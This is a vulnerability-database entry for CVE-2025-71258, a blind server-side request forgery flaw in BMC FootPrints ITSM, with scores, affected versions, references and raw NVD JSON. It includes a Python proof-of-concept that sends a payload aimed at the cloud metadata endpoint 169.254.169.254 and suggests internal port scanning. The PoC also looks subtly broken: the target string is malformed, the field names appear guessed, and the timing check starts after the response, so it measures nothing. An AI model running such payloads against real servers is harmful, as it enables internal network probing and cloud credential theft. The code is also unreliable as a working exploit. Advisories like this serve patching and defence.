Security Vulnerability Report
中文
CVE-2025-71258 CVSS 4.3 MEDIUM

CVE-2025-71258

Published: 2026-03-19 14:16:13
Last Modified: 2026-04-22 17:25:06
Source: [email protected]

Description

BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain a blind server-side request forgery vulnerability in the searchWeb API component that allows authenticated attackers to cause the server to initiate arbitrary outbound requests. Attackers can exploit improper URL validation to perform internal network scanning or interact with internal services, impacting system availability. The following hotfixes remediate the vulnerability: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, and 20.24.01.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:bmc:footprints_itsm:*:*:*:*:*:*:*:* - VULNERABLE
BMC FootPrints ITSM 20.20.02
BMC FootPrints ITSM 20.20.03
BMC FootPrints ITSM 20.21.01
BMC FootPrints ITSM 20.21.02
BMC FootPrints ITSM 20.22.01
BMC FootPrints ITSM 20.23.01
BMC FootPrints ITSM 20.24.01
BMC FootPrints ITSM 20.20.02 through 20.24.01.001

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time target = "https://vulnerable-server/ searchWeb endpoint" # Blind SSRF PoC - check internal metadata service # This PoC demonstrates how an attacker can cause the server to make arbitrary requests def exploit_ssrf(target_url, attacker_callback): """ PoC for CVE-2025-71258 - BMC FootPrints ITSM Blind SSRF This demonstrates sending a crafted request to the searchWeb API that causes the server to initiate an outbound request to an arbitrary URL. Note: In a real attack, the attacker would use time-based detection or an external server to log the requests. """ # Malicious payload targeting internal metadata service payload = { "searchQuery": "test", "url": "http://169.254.169.254/latest/meta-data/" # AWS metadata endpoint } # Alternative: Internal port scanning # payload = { # "searchQuery": "test", # "url": "http://internal-server:port/path" # } try: response = requests.post(target_url, json=payload, timeout=10) # Time-based detection for blind SSRF start_time = time.time() # If the request takes longer, the port might be open # (connect timeout vs read timeout behavior) return { "status": response.status_code, "response_time": time.time() - start_time } except requests.exceptions.Timeout: # Timeout may indicate the request was made but no response return {"status": "timeout", "note": "Potential SSRF detected"} except Exception as e: return {"error": str(e)}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71258", "sourceIdentifier": "[email protected]", "published": "2026-03-19T14:16:13.180", "lastModified": "2026-04-22T17:25:06.440", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain a blind server-side request forgery vulnerability in the searchWeb API component that allows authenticated attackers to cause the server to initiate arbitrary outbound requests. Attackers can exploit improper URL validation to perform internal network scanning or interact with internal services, impacting system availability. The following hotfixes remediate the vulnerability: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, and 20.24.01."}, {"lang": "es", "value": "Las versiones 20.20.02 a 20.24.01.001 de BMC FootPrints ITSM contienen una vulnerabilidad de falsificación de petición del lado del servidor ciega en el componente API searchWeb que permite a atacantes autenticados hacer que el servidor inicie peticiones salientes arbitrarias. Los atacantes pueden explotar una validación de URL incorrecta para realizar escaneo de red interno o interactuar con servicios internos, afectando la disponibilidad del sistema. Los siguientes hotfixes remedian la vulnerabilidad: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002 y 20.24.01."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bmc:footprints_itsm:*:*:*:*:*:*:*:*", "versionStartIncluding": "20.20.02", "versionEndIncluding": "20.24.01.001", "matchCriteriaId": "847E5686-7CB0-4A4F-952D-E3D9D2CF7BE8"}]}]}], "references": [{"url": "https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/Release-notes/2024-Release-01-Patch-2/", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/bmc-footprints-itsm-blind-ssrf-in-searchweb", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.